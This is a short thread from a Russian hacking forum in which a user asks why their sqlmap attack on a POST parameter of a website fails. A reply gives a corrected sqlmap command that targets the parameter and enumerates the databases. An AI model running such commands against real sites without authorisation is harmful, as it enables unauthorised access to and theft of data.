Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   Нужна помощь SQLMAP (https://forum.antichat.xyz/showthread.php?t=475198)

qwerty1qwerty 19.01.2020 03:07
Сканер показал что в параметре random есть иньекция. Смотрю исходник где показал вроде как есть. Но Не работает map, и выдает странную ошибку.Впервые такое,гугл не помог. Что я не так делаю???

https://fastpic.at.ua/_nw/24/40523387.jpg

-u https://site.com --data "code=94102&month=01&random=%5c&year=2015&_token=A mkrx5wyiyqwZKS0sJgkFKIqylbSCE61TpRgo8ME" -p "random" --method POST --risk=3 --random-agent

karkajoi 19.01.2020 14:41
Цитата:
Сообщение от qwerty1qwerty
qwerty1qwerty said:

Сканер показал что в параметре random есть иньекция. Смотрю исходник где показал вроде как есть. Но Не работает map, и выдает странную ошибку.Впервые такое,гугл не помог. Что я не так делаю???
https://fastpic.at.ua/_nw/24/40523387.jpg
-u
https://site.com
--data "code=94102&month=01&random=%5c&year=2015&_token=A mkrx5wyiyqwZKS0sJgkFKIqylbSCE61TpRgo8ME" -p "random" --method POST --risk=3 --random-agent
--url "https://site.com" --data="code=94102&month=01&random=*&year=2015&_toke n=Amkrx5wyiyqwZKS0sJgkFKIqylbSCE61TpRgo8ME" --dbs --risk=3 --level=3 --dbms=mysql(или что там у тебя) --random-agent

B сканерам верить такое себе, часто просто ложное срабатывание. Подозреваю что токен валидный нужен


Время: 00:40